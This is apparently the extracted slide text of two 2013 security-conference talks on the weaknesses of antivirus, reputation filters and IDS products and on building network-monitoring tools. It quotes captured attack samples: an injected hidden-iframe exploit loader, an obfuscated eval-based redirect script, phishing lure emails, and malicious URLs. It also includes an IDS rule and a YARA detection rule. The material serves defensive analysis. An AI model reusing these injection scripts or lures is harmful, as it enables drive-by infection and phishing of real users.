Upload
blah-
View
106
Download
2
Embed Size (px)
DESCRIPTION
a talk we gave at g0s conference in delhi
Citation preview
Why there is no Silver BulletWhats Wrong with modern security tools:
Exploring (in)accuracy and (in)correctness of modern network defense products
V. Kropotov; F. Yarochkin; V. Chetvertakov
GroundZero 2013
About speakers
● Our interests are studying malicious behavior on the network traffic
● We get greater visibility of on-going activities by monitoring network traffic in Russia and Taiwan
● We are very interested in expanding So if you have pcaps to share, talk to us :-D
@fygrave @vbkropotov @sinitros89
Agenda (PT1)
● Security Threats Landscape (intro)● AV Trolls● NetSec Trolls● Combo Trolls● What else could go wrong ;)● Conclusion
We work together as a research teamToday's two presentation topics are connected.
The second presentation will be a logical continuation of the this talk
Security ThreatsLandscape
Traffic drives cybercrime economy
● You can learn quite abit about primary victims by simply reading thematic forums :)
Traff Pricing
Source:A botnet load sellingportal
How to get traff
● Web servers compromise (most common)● DNS servers or domain names hijacked
(add examples from afraid.org)● Banner campaign (adserver/openx
compromise. (swiss-cheese ;))● Other infrastructure compromised.
Example: memcache poisoning
Primary victims
● About 40 000 000 Internet users in Russia
According our stats:● For every 10 000 hosts in Russia● 500 hosts redirected to landing page every week● 25-50 hosts with typical protection scheme (NAT,
proxy with antivirus, vendor supplied reputation lists, etc.) are COMPROMISED
Malicious CampaignsIn 2013
News/Media outlets are very popular this year
Domain Resource type Campaign dates unique hosts per day
rg.ru News – official gov publisher
Autumn 2013 ~ 790 000
newsru.com news Winter 2013 – Autumn 2013 ~ 590 000
gazeta.ru news Spring 2013 - Autumn 2013 ~ 490 000
aif.ru news Spring 2013 - Autumn 2013 ~ 330 000
mk.ru news Summer 2013 ~ 315 000
vz.ru news Winter 2013 – Summer 2013 ~ 170 000
lifenews.ru news Summer 2013 ~ 170 000
topnews.ru news Spring 2013 - Autumn 2013 ~ 140 000
Video, mail, regional gov – you choose...!
Domain Resource type When seen unique hosts per day
Youtube.com Summer 2013 - Autumn 2013 (malvertising?!)
Alexa N 3
mail.ru Public email, search engine
Winter 2013 Alexa N 33
Vesti.ru TV news Winter 2013 ~ 1 050 000
tvrain.ru TV Autumn 2013 ~ 250 000
mos.ru Moscow gov portal Winter 2013 – Spring 2013 ~150 000
glavbukh.ru Accountants Spring 2013 - Autumn 2013 ~65 000
tks.ru Finance (Import/Explort)
Summer 2013 - Autumn 2013 ~38 000
Oops, a regional GOV resource, July 2013
<script src="http://changeip.changeip.name/rsize.js">
So you have your exploit crawling framework? - can it move the mouse
too... :)● <script src="http://changeip.changeip.name/rsize.js">● res='bhduqnd.selfip.org';var astatf = 0;● document.write("<head></head><b><div id='accountil'></div></b>");● document.onmousemove=jsstatic;● function jsstatic() { if (astatf == 0) { astatf++; text = "<iframe
src='http://"+res+"/bashimme/2' width='7' height='12' style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe>";
● document.getElementById("accountil").innerHTML = text }}● </script>
Meet the exploit-serving BING
dns abuse of a legit domain
● domain: SCHOOLOPROS.RU
● nserver: ns1.afraid.org.
● nserver: ns2.afraid.org.
● state: REGISTERED, DELEGATED, VERIFIED
● org: LLC "GKShP"
● registrar: RU-CENTER-REG-RIPN
● admin-contact: https://www.nic.ru/whois
● created: 2010.01.25
● paid-till: 2014.01.25
● free-date: 2014.02.25I
How are you going to blacklist this?!
deaswqwehdskdqw.homelinux.com → 176.31.140.65
● b3f21817812f11a62eb1b506.homelinux.com → 93.189.29.235
● 5f87b942cfa67def68889b81.homelinux.com → 93.189.29.235
lapachka.info → 93.189.29.235Domain Name:LAPACHKA.INFOCreated On:05-Jun-2013 20:31:33 UTCLast Updated On:20-Aug-2013 07:36:23 UTCExpiration Date:05-Jun-2014 20:31:33 UTCSponsoring Registrar:DomainContext Inc. (R524-LRMS)
18
File extension based filters?!
http://hk.sz181.com/images/c4a.jpg
name:(ShenZhen Johns Property Accessory Supply Co.,LTD) mail:([email protected]) +86.75526919616 +86.75526919856 ShenZhen Johns Property Accessory Supply Co.,LTD
<object width="640" height="60" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#4,0,0,0"><param name="SRC" value="http://www.35.com/upload/35WHOIS_FLASH__640_60.swf"><embed src="http://www.35.com/upload/35WHOIS_FLASH__640_60.swf" width="640" height="60"></embed></object>
Billing Contactor: ShenZhenShi ShenNanDaDao1021 Hao XiNianZhongXin 12A03 SHENZHEN Guangdong, CN 518040
name:(ShenZhen Johns Property Accessory Supply Co.,LTD) mail:([email protected]) +86.75526919616 +86.75526919856 ShenZhen Johns Property Accessory Supply Co.,LTD
← Win32 Executable (payload)
Domain Name:sz181.comRecord last updated at 2013-03-11 09:27:18Record created on 3/10/2005Record expired on 03/10/2014
So how fast are Security Vendors with new signatures?!
● AntiVirus Vendors – Hours..Days● Network Proxy Filtering - Days..Weeks● Other network security –
Days..Weeks..Months ..?
20
Updates are dangerous too. This kills an executable from a legit
SAP installation
21
so.. the FUI (Fuck up indicators)
● Antivirus == damn good Fuck Up indicator of your daily monitoring work. If you see ex. CVE-2012-0158 the e-mail, received 1 year ago - you see you fucked it up a year ago, but now must be able to react. :)
25.10.2012 18:01 Test_host01 Exploit-CVE2012-0158.f!rtf
Undetermined clean error, deleted successfully
C:\Documents and Settings\User02\Desktop\2read\Modern energy in China.msg\68.OLE
25.10.2012 18:01 Test_host01 Exploit-CVE2012-0158.f!rtf
Undetermined clean error, deleted successfully
C:\Documents and Settings\User02\Desktop\2read\US energy.msg\68.OLE
Email as attack vector.. are you a target?
● Single exploit● Content of the mail is
accurate to context● Specific payload
behavior (stats)
● Mass-mailed● Often no exploit used
(.exe in attach)
APT? Non-targeted
APT through email.. An RTF document
(CVE-2012-0158 - "MSCOMCTL.OCX RCE Vulnerability." )
Payload writes a dll fileRecent build date (2013)Autorun for persistence
Calls back to C2 server groupSuspicious user Agents:
Mozilla/4.0 (compatible; MSIE 6.0.1.3; Windows NT 5.0.3)
Mozilla/4.0 (compatible; MSIE 5.0.2) Mozilla/4.0 (compatible)
Owning a network..
● Vulnerabilities seen in use through this attack vector:
Adobe Acrobat readerCVE-2013-0640CVE-2012-0775Adobe flash playerCVE-2012-1535
MS OfficeCVE-2012-0158CVE-2011-1269CVE-2010-3333CVE-2009-3129
JavaCVE-2013-0422CVE-2012-1723CVE-2012-5076
But...
● Human stupidity is exploited more than ever..
Email with a password protected archive or a document
● Password protected archives bypass AV checks, firewall/WAF/.. detection
● No exploit. Executable File is masked as document (icon, extension)
● Message contents motivates user to open the attachment (social engineering)
Добрый день, По результатам проверки, у нашей фирмы обнаружился долг перед Вами за январь насумму 9540 рубл. Наш главбух составила акт сверки и просит подписать данный акти выслать его скан. А также спрашивает, что лучше написать при переводе средств._____________________________________________________________________________________
С уважением, комерческий директор ОАО "М-ТОРГ"Маркина Ольга Алексеевна
ps. акт сверки в приложении к письму, пароль к архив 111
Lets look at some examples
Добрый день,По результатам аудиторской проверки, у нашей фирмы обнаружился долг пере Вами задекабрь 2012г. в сумме 49540 рубл. Наш главбух составила акт сверки и просит подписатьданный акт и выслать его скан. А также спрашивает, что лучше написать при переводесредств. _______________________________________________________________________________
С уважением, бухгалтер ЗАО "МСК"Калинина Вера Владимировна
ps. акт сверки в приложении к письму, пароль к архиву 123
Examples (cont...)
Good afternoon, According to the results of the audit, our firm will transfer the debt to you for? December 2012. in the sum of 49540 rubles. Our chief accountant make an act of reconciliation and asked to sign the act and send it’s scan. ______________________________________________________________________________Sincerely, Accountant of "MSK"? Vera V. Kalinina P.s. statement attached to the letter, the password for the archive 123
Unpacked file
.. and inside archive :)
Subject: British Airways E-ticket receiptse-ticket receiptBooking reference: 05V9363845Dear,Thank you for booking with British Airways.Ticket Type: e-ticketThis is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking.Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)Yours sincerely,British Airways Customer ServicesBritish Airways may monitor email traffic data and also the content of emails, where permitted by law, for the purposes of security and staff training and in order to prevent or detect unauthorised use of the British Airways email system.British Airways Plc is a public limited company registered in England and Wales. Registered number: 89510471. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex, England, UB7 0GB.How to contact usAlthough we are unable to respond to individual replies to this email we have a comprehensive section that may help you if you have a question about your booking or travelling with British Airways.If you require further assistance you may contact usIf you have received this email in errorThis is a confidential email intended only for the British Airways Customer appearing as the addressee. If you are not the intended recipient please delete this email and inform the snder as soon as possible. Please note that any copying, distribution or other action taken or omitted to be taken in reliance upon it is prohibited and may be unlawful.
Another example
Another variation: email that contains masked links to malicious
pages•No attachment. The message text is html/text points to the same resource
•All links are 'masked' to be pointing to legit links
•The same attreactive text of the message
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="val";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,100,111,113,115,109,44,106,97,45,112,117,57,54,48,55,46,47,101,109,114,116,107,47,107,103,110,106,113,47,98,109,108,116,107,110,45,110,104,111,32,59,124);}w=f;s=[];if(window.document)for(i=2-2;-i+104!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+j%zz);}xz=e;if(v)xz(s)}</script>
</body>
</html>
Encoded redirect..
Hot topic for big company, Cyprus Crisis
Diana Ayala saw this story on the BBC News website and thought you should see it. ** Cyprus bailout: bank levy passed parliament already! **Cyprus can amend terms to a bailout deal that has sparked huge public anger....< http://www.bbc.com.us/go/em/news/world-cyprus-57502820> ** BBC Daily E-mail **Choose the news and sport headlines you want - when you want them, all in one daily e-mail< http://www.bbc.co.uk/email> ** Disclaimer **The BBC is not responsible for the content of this e-mail, and anything written in this e-mail does not necessarily reflect the BBC's views or opinions. Please note that neither the e-mail address nor name of the sender have been verified. If you do not wish to receive such e-mails in the future or want to know more about the BBC's Email a Friend service, please read our frequently asked questions by clicking here
This message is to notify you that your package has been processed and is on schedule for delivery from ADP. Here are the details of your delivery:Package Type: QTR/YE ReportingCourier: UPS GroundEstimated Time of Arrival: Tusesday, 5:00pmTracking Number (if one is available for this package): 1Z023R961390411904Details: Click here to view and/or modify orderWe will notify you via email if the status of your delivery changes.--------------------------------------------------------------------------------Access these and other valuable tools at support.ADP.com:o Payroll and Tax Calculatorso Order Payroll Supplies, Blank Checks, and moreo Submit requests online such as SUI Rate Changes, Schedule Changes, and moreo Download Product Documentation, Manuals, and Formso Download Software Patches and Updateso Access Knowledge Solutions / Frequently Asked Questionso Watch Animated Tours with Guided Input InstructionsThank You,ADP Client Servicessupport.ADP.com--------------------------------------------------------------------------------
This message and any attachments are intended only for the use of the addressee and may contain information that is privileged and confidential. If the reader of the message is not the intended recipient or an authorized representative of the intended recipient, you are hereby notified that any dissemination of this communication is strictly prohibited. If you have received this communication in error, notify the sender immediately by return email and delete the message and any attachments from your system.
What happens if you click..
Antivirus find exploit in cache -> we was attacked -> antivirus saves us! ;-)
The exploit can be in cache – AV finds it :)
AV logs – useful ;)
sAV actually removes a forensic trace. PROFFIT :)
Incident entry point
● Many vendors able to mine their clouds● But you need know a starting point for your
exploration ...
Death of AVs as we know them
● Automatic malicious binaries builders
– Unskilful attacker can produce unique binaries with a single click
One sig per binary makes you transfer Tbs of data to end-user machines :)
A simple solution – move sigs into cloud :-)
AV trolls
Dr. Web
TrendMicro
AV behaviour is not new
● EmergingThreats rule, first added 2011-06-27 20:14:35 UTC
alert udp $HOME_NET any -> any 53 (msg:"ET CURRENT_EVENTS Large DNS Query possible covert channel"; content:"|01 00 00 01 00 00 00 00 00 00|"; fast_pattern; depth:10; offset:2; dsize:>300; content:!"youtube|03|com|00|"; content:!"sophosxl|03|net|00|"; content:!"|0a|hashserver|02|cs|0a|trendmicro|03|com|00|"; content:!"spamhaus|03|org|00|"; classtype:bad-unknown; sid:2013075; rev:7;)
AV trolls
● Date/Time 2011-09-06 17:13:05 MSD● Tag Name PDF_XFA_Script● Severity Low● Target IP Address 10.x.x.x● Target Port 9090● Source IP Address 10.y.y.y● SourcePort Name 3201● arg host=http://sonorophone.in&b=af7bb2f●
46
VT says nothing? payload in .jar feb 2013
AV is silent during attack, WHY?
Just because malware obfuscation service is available
● 70$ per month, is it OK, *
* Max Goncharov Talk at PHDaysIII
So how do you know when to re-encrypt?
Example, Aug 2013
<object height="0" align="left" width="0" type="text/html" data="http://wrutr.VizVaz.com/viewforum.php?b=cc119b1"></object>
Attack in Fiddler
https://www.virustotal.com/en/file/70c21fb812665fc1d75b158b7a48f4e85cbaf5bcc37a2dfd0d0555a7f561f9a8/analysis/1376491063/
https://www.virustotal.com/en/file/deeee11c34a55901e368db3a715419ae886a33be3f504fd1203076b6eeb62502/analysis/1376490991/
August 2013
53
Detection During the Time
October 2013
54
Side effects of heuristic detection
August 2013
October 2013
55
56
AV claims: VT is Not Fair??
23.01.13 19:56 Detected: Trojan-Spy.Win32.Zbot.aymr C:/Documents and Settings/user1/Application Data/ Sun/Java/Deployment/cache/6.0/27/4169865b-641d53c9/UPX
23.01.13 19:56 Detected: Trojan-Downloader.Java.OpenConnection.ck C:/Documents and Settings/user1/Application Data/ Sun/Java/Deployment/cache/6.0/48/38388f30-4a676b87/bpac/b.class
23.01.13 19:56 Detected: Trojan-Downloader.Java.OpenConnection.cs
C:/Documents and Settings/user1/Application Data/Sun/Java/Deployment/cache/6.0/48/38388f30-4a676b87/ot/pizdi.class
23.01.13 19:58 Detected: HEUR:Exploit.Java.CVE-2013-0422.gen
C:/Documents and Settings/user1/Local Settings/ Temp/jar_cache3538799837370652468.tmp
57
Yes. You have been compromised one week before...
1/14/2013 18:57
178.238.141.19 http://machete0-yhis.me/ pictures/demos/OAggq
application/x-java-archive
1/14/2013 18:57
178.238.141.19 http://machete0-yhis.me/pictures/demos/OAggq
application/x-java-archive
1/14/2013 18:57
178.238.141.19 http://loretaa0-shot.co/careers.php?cert=561&usage=392&watch=4&proxy=49&ipod=171&shim=344&pets=433&icons=252&staff=621&refer=345
application/octet-stream
* reproduced on the stand, to estimate Vendor signatures updated time
58
Avs are still useful.. lets look at some examples
● Bootkits● Rootkits● Others
59
Appropriate AV use
30.10.2013 5:46
file infected. Undetermined clean error, deleted successfully
Generic.dx!4C9C664321AD
c:\Total Commander 7.00 PP 0.50 .exe\FITW.EXE
30.10.2013 6:37
file infected. Undetermined clean error, deleted successfully
Generic.dx!4C9C664321AD
c:\Total Commander 7.00 PP 0.50 .exe\FITW.EXE
30.10.2013 6:44
file infected. Undetermined clean error, deleted successfully
Generic.dx!4C9C664321AD
c:\Total Commander 7.00 PP 0.50 .exe\FITW.EXE
30.10.2013 6:50
file infected. Undetermined clean error, deleted successfully
Generic.dx!4C9C664321AD
c:\Total Commander 7.00 PP 0.50 .exe\FITW.EXE
30.10.2013 6:57
file infected. Undetermined clean error, deleted successfully
Generic.dx!4C9C664321AD
c:\Total Commander 7.00 PP 0.50 .exe\FITW.EXE
30.10.2013 6:58
file infected. Undetermined clean error, deleted successfully
Generic.dx!4C9C664321AD
c:\Total Commander 7.00 PP 0.50 .exe\FITW.EXE
30.10.2013 7:01
file infected. Undetermined clean error, deleted successfully
Generic.dx!4C9C664321AD
c:\Total Commander 7.00 PP 0.50 .exe\FITW.EXE
30.10.2013 7:04
file infected. Undetermined clean error, deleted successfully
Generic.dx!4C9C664321AD
c:\Total Commander 7.00 PP 0.50 .exe\FITW.EXE
30.10.2013 7:11
file infected. Undetermined clean error, deleted successfully
Generic.dx!4C9C664321AD
c:\Total Commander 7.00 PP 0.50 .exe\FITW.EXE
60
Appropriate AV use Cases, Email under attack, exe usually not
targetedEvent Generated Time (UTC)
Threat Name Event Category
Threat Type
Threat Target File Path
10/23/13 12:03:54 AM
PWSZbot-FIU!059FF890153F
Malware detected
Trojan KURUOGLU 5 Enquiry.zip\KURUOGLU 5 Enquiry..exe
10/25/13 4:55:37 AM
PWSZbot-FIU!BC53FFF6285D
Malware detected
Trojan Info_Invoice..no.166583.zip\Info_Invoice..no.166583.exe
61
Appropriate AV use Cases, Office documents
● Event Generated Time (UTC): 7/8/13 12:25:46 PM ● Threat Source User Name: "Sports .ru"
<[email protected]> ● Threat Target File Прогнозы на Евро 2012 от
экстрасенсов и аналитиков.doc* ● Event Category: Malware detected ● Threat Name: Exploit-CVE2012-0158.b!rtf ● Threat Type: Virus ● Action Taken: Deleted
* Euro 2012 forecast from ... doc
62
Appropriate AV use Cases, The same file was deleted, but many
timesThreat Name Event Received
Time (UTC)Action Taken
Threat Target File Path
RDN/Generic.dx!cmr
10/27/13 9:56:54 PM
Deleted C:\Documents and Settings\test-user\Application Data\svchost.exe
RDN/Generic.dx!cmr
10/28/13 10:05:06 PM
Deleted C:\Documents and Settings\test-user\Application Data\svchost.exe
RDN/Generic.dx!cmr
10/29/13 9:54:37 PM
Deleted C:\Documents and Settings\test-user\Application Data\svchost.exe
RDN/Generic.dx!cmr
10/30/13 5:23:49 AM
Deleted C:\Documents and Settings\test-user\Application Data\svchost.exe
RDN/Generic.dx!cmr
10/30/13 9:42:07 PM
Deleted C:\Documents and Settings\test-user\Application Data\svchost.exe
RDN/Generic.dx!cmr
10/31/13 9:55:37 PM
Deleted C:\Documents and Settings\test-user\Application Data\svchost.exe
Network Security ToolsLoLs and Trolls :)
64
Vendor FP
65
Vendor FP
DNS Traffic Analysis..What you can do with this event?
“REP.xlfkl”, is it dangerous?
Where is the booby trap
Unfortunately it is HERE
Yep, vendor were able to detect APT
71
Appropriate Network tools use● Pray● Detect as you can● Check, maybe your vendor supplied tool
detected it somehow, and you can use this information, but next time
Date/Time 2012-05-15 11:50:16 Tag Name HTTP_PostSeverity LowObservance Type Intrusion DetectionTarget IP Address 74.63.83.38:server be4appy.com:URL /rep/cim.phpalgorithm-id 3000003Packet DestinationPort 80
Oh, yepp, Web proxies
Reputation filters
Exploit Kits and TDS now personal?● hxxp://get.adnova.ru/?v2=1&ver=2&pad=2943&block=1362768946&url=http%3A%2F
%2Fratushnyak.org%2Fpage%2Fshark-cartilage.html&ref=http%3A%2F%2Fnova.rambler.ru%2Fsearch%3Fquery%3D%25D0%25B0%25D0%25BA%25D1%2583%25D0%25BB%25D0%25B8%25D0%25B9%2B%25D1%2585%25D1%2580%25D1%258F%25D1%2589%2B%25D0%25BE%25D1%2582%25D0%25B7%25D1%258B%25D0%25B2%25D1%258B&sw=1280&sh=1024&cw=1189&ch=879&fl=0&nc=0.2519320439819137 -->
● gendarme795.kiltie146.dyndns-pics.com 54.217.234.176 80 GET● hxxp://gendarme795.kiltie146.dyndns-pics.com/?in=51118 Wed, 23 Oct 2013 12:20:25 GMT● Personal Network Storage, Internet Services
Exploit Kits and TDS now personal?
● hxxp://nashaporno.ru/ --> qzzj.dyndns.tv 176.122.88.106
● GET hxxp://qzzj.dyndns.tv/out.php?sid=1 ● Tue, 08 Oct 2013 06:58:32 GMT ● Personal Network Storage, Internet
Services
May be forums?
● 37.9.52.134 80 GET● hxxp://bzsdrt.attraction-visitors.ru/
viewforum.php?b=ca3990d text/html● Tue, 15 Oct 2013 06:51:39 GMT● Forum/Bulletin Boards
Or Internet Services
● 37.9.52.103● hxxp://uistodr.is-an-accountant.com
/viewforum.php?b=75c3d28text/html● Wed, 16 Oct 2013 11:24:53 GMT● Internet Services
Oops, innovate search engine?● 95.211.39.86 tanyauaa90.ru● http://tanyauaa90.ru/tuka4/?1&se_referer=http%3A%2F%2Fnova.rambler.ru
%2Fsearch%3Fquery%3D%25D1%2586%25D0%25B5%25D1%2580%25D0%25BE%25D0%25B1%25D1%2580%25D0%25B0%25D0%25B7%25D0%25B5%25D0%25BB%25D0%25B8%25D0%25BD%2B%25D0%25BF%25D1%2580%25D0%25BE%25D0%25B8%25D0%25B7%25D0%25B2%25D0%25BE%25D0%25B4%25D0%25B8%25D1%2582%25D0%25B5%25D0%25BB%25D1%258C&referer=http%3A%2F%2Fspireritmen1293.dlinkddns.com%2Foe4500drajverad555%2Fcerobrazelin_instrukciya_po_primeneniyu_cena.html
● Fri, 18 Oct 2013 08:39:17 GMT● Search Engines, Internet Services●
●
domain: TANYAUAA90.RUregistrar: REGRU-REG-RIPNcreated: 2013.10.17
Or Even Wiki page
● benefaction.ru.heaven774.blogdns.com54.217.234.176http://benefaction.ru.heaven774.blogdns.com/?in=55530
● Tue, 08 Oct 2013 12:15:03 GMT● Blogs/Wiki
Reputation filters won't help here
● On available Environments
less than 10% of malicious resources
categorized as malicious bu vendor supplied reputation filters during October 2013
81
Site: alldistributors.ruURL on the same site: alldistributors.ru/image/
Reputation filters won't help here
Yep, they are all legit!
Some of them older than 10 years
● Over 500 compromised domains in 24 hours
● Domain rotation once per minute (3 minutes in the other incident)
What do you know about more sophisticated bots?
Proliferation of malware that uses blogging/social networks as c2
GET / ….User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: Connection:Cache-Control:Pragma:
Explore header anomaly
Elirks: v01
Reported by Dell/Secureworks as Elirks http://www.secureworks.com/cyber-threat-intelligence/threats/chasing_apt/
88
Elirks, v02
http://tw.myblog.yahoo.com/jw!uzrxZwSGHxowPMGZAaj4I50- http://blog.yam.com/minzhu0906/article/54726977
http://diary.blog.yam.com/bigtree20130514/article/10173342
http://tw.myblog.yahoo.com/jw!uzrxZwSGHxowPMGZAaj4I50-
http://blogs.yahoo.co.jp/sakasesi2013/31805794.html
http://www.plurk.com/mdbmdb
89
Campaigns can be linked by the same IP sources to
access web
Managed by the sameIP addresses(easy to cross-correlate)
90
Ready to catch them?
Scalable Tools for Advanced Network Monitoring
Discover malware operations with your bare hands
V. Kropotov; F. Yarochkin
Gaand de Dhakkan
FOR YOUR NETWORK :)
Agenda
The battle field: network traff0.5% of your traffic is what you really want.. now what..?Off-shelf tools and their problemsAutomation of manual work. Alot of automationExamples and Case studies Conclusions
DisclaimerWe'll mainly talk about our experience with
scalable network monitoring.Some of the tools we are about to mention, we
have developed ourselves.Other tools are done by other great guys and we
are heavy users of those.
Monitoring VS Protection
● Strange, but true
Efficiency(Monitoring)~O(1/ Efficiency(Protection))
Passive detection VS Active protection
● False positives for these methods● The cost of the time lag with passive detection● The cost of DoS from Active protection
Incident Mitigation VS Investigation
● If your preparation is not enough
Efficiency(Mitigation)~ O(1/ Efficiency(Investigation))
● If you prepared, almost all steps of Investigation you can do asynchronously
Not typical approaches
● Snapshotting ● DNS Analysis and traffic Redirection (Internal
sinkholing)● Sandboxing
100
Systematic Defense
● What to look at● How to look at your data● How to prepare well for an
attack (you can't walk into the same river twice, so 'preserve' the flow)
Rinse and repeat ;-)
Old skool network analysis :)
Snort is handy● Single node● Patterns specified in rule files● You get notified when alert occurs● You can specify some auto-reactive rules to
act real-time
What's missing
● ability to capture from multiple nodes and merge the results (me → snortnet, 1999 :p)
● Your snort (or any other IDS) will miss stuff that is not in signatures, now what ..
● Running experimental analytics, FP analysis on IDS results is very difficult because there is no 'raw data'
Solution:
Store everything!? :-D
Just like |\|SA! ;)
Now made possible..
We need a more than one node to store data
We need some sort of data management planAnd ..
A convenient way of finding things.. quick!
ElasticSearch
● really awesome, all my data lives here ;)
ES
● Multiple Indices, easy cross-correlation, data HA, Lucene-based search capability
● Design your data flow smartly (simple things: indices are fast to remove, individual items – are not, store metadata, keep raw data where it was captured)
So what we store
● Our feeds into ES:– Honeypot logs
– Network monitoring with eyeipflow scriptlets
– Network data from Moloch
– DNS traff analysis
– User-Agent/IP/time maps
What to look at....
● Suspicious agents – works nicely (and easy to implement with snort, surricata, etc)
● Time-series traffic analysis
Emerging Threats has a large number of APT related sigs. Take-and-modify :)
Not only payload used as transition (covert channel in URL)
● GET hxxp://lionsholders.biz/st.php?os=windows%207&browser=msie&browserver=8.0& adobe%20reader=10.1&adobe%20flash=11.7.700.169&windows%20media%20player=12.0.7601.17514&java=0&silverlight=0
Honeypots
● Service-simulation honeypots. Collect plenty tracers on random network opportunists.– Ex: kippo (modified to keep trace-log in ES):
Nice collection of Romanian tools over the years ;-)
eyeipflow
● Libwireshark + python + yara. Capable of processing pcap files that you collect else-where.
● Libsniff-ng is good for high-volume traff● Store meta-data on various protocol
transactions: HTTP, SMTP, DNS ..
And then we discovered Moloch :)
Moloch
Uses libnids for packet reassemblyMulti-protocolSupports yara
Actively developedSupports plugin architecture
Custom taggers are extremely useful
Moloch with plugins (on DRUGS!)
Moloch is developed by a team at AOL and released open-source at http://github.com/aol/moloch/
Introduction to writing...
moloch plugins
Introduction to writing moloch plugins
● moloch_plugin_init() {
moloch_plugin_register(“leet”, FALSE);
/* register callbacks */
moloch_plugin_set_cb(“leet”, A, B, C, D, E, F, H, I }
/* the rest of your init stuff */
}
Moloch plugins (pt 2)
● Callbacks:– A) MolochPluginIpFunc ipFunc,
– B) MolochPluginUdpFunc udpFunc,
– C) MolochPluginTcpFunc tcpFunc,
– D) MolochPluginSaveFunc preSaveFunc,
– E) MolochPluginSaveFunc saveFunc,
– F) MolochPluginNewFunc newFunc,
– G) MolochPluginExitFunc exitFunc,
– H) MolochPluginReloadFunc reloadFunc
And even more
● moloch_plugins_set_http_cb( …
Redundancy Properties in the malware
distribution and postinfection
activities campaigns
Passive DNS data is used to identify DGA malware C2 servers
Passive HTTP monitoringand anomaly detection
Wavelet-based analysis
129
Proxy logs at glance example
130
User-agent vulnerable clients monitoring
131
User-agent request example, Why legit Win8 is here?
132
Silent Debugging?? Host, OS, more than other 20 params..
● Local host name HMS0277
X-Client/AppexWin8 X-Client-AppVersion/1.2.0.135 09.08.2013 8:13 131.253.40.10 80 GET
● http://g.bing.net/8SE/201?MI=FED21F3944A344D38E5C61C00AC78AC3&AP=3&LV=1.2.0.135&OS=W8&TE=1&TV=ts20130613214629143%7Ctz-240%7Ctmru-ru%7Ctc1%7Cdr8%252C0%7Caa1058%252F1%252C0%252F0%7CdaHMS0277%7CorRU%7Cwa1%7Cde4%7Cad1%252C0%7Ccd9%252C0%7Cdd0%7Ctp20130505%7Cccrow%7Cdc1%7Cpd1%252C0%7Cto4%7Clc1%252C0%252C0%252C0%7Cdb1
133
User-agent anomaly monitoring
134
Proxy logs processingThe ideas
see the code example in our git https://github.com/fygrave/ndf
1. Take predefined patterns for log fields and calculate log line score. Depending on score write down line into colored (EB,B,W,EW,Gr) list for further investigation (--list)2. Find all lines with field matched specified pattern – smth. like egrep+cut\awk
(--match)
135
General course of work (list search)
136
General course of work (match search)
137
The scenario
1. --list ==> Scored rows with signatures ==>
Users in troubles
2. --match ==> Find all history about users in
troubles – before and after signature ==> Further
manual investigation
3. Update signatures if need to
Yara - based
Easy to integrate with your scripts
Integration with a proxy server is possible via icap yara plugin: https://github.com/fygrave/c_icap_yara (inline analysis)
Raw network traffic monitoring project (and http/DNS indexing):
https://github.com/fygrave/eyepkflow (passive HTTP)
139
Detecting typical fields inside payload
● For example (YARA):
Rule SploitMatcher {strings: $match01 = "com.class'" $match02 = "edu.class" $match03 = "net.class"
$match04 = “security.class” condition: all of them}
Problem: you can't deobfuscate javascript with Yara. But you can block the payload,Which would be fetched by the javascript, thus break the exploitation chain.
140
Or you can roll your own..personal crawler with yara
and jsonunpack :) see the code example in
our git https://github.com/fygrave/ndf
Other cool YARA tools
Moloch https://github.com/aol/moloch
Yara mail https://github.com/kevthehermit/yaraMail
Yara pcap https://github.com/kevthehermit/YaraPcap
What we will see in 2014● Android based platforms would be one of the primary
targets
● Vendor supplied reputation filters won't be so effective, due the compromised legit domains pool size
● Commercially oriented cyber criminals will use non standard ports, abused hosting, DNS servers and short time frames as now in Russia.
● Cyber criminals will act outside the country of their residence (it's better for Russia, but only for Russia...)
● Defenders will use more and more own signatures, rules, tools and pills to survive.
143
Roll your own..To survive in this dangerous
environment.
Forecast for 2014:
Conclusion
We've seen interesting techniquesWe've seen that the 'low-hanging fruit' is not so
low anymore :)
Now it is the time for questionsAnd throwing your shoes ;-)
Collaboration via hpfeeds
Tools
Developed by our lab:− Eyepkflow http://github.com/fygrave/eyepkflow− DNSLyzer http://gtihub.com/fygrave/dnslyzer− HPFeeds Broker – no public release
3rd party tools we use:− Redis, ElasticSearch, Moloch, Hpfeeds library,
RabbitMQ, zmap
Data Acquisition options
- We have a software agent (unix(freeBSD, linux, Solaris) platform compatible)
- We can process pcap files.
- We can deploy processing platform at your facility (we need remote access)
- We have a collector device (1Gb network interface)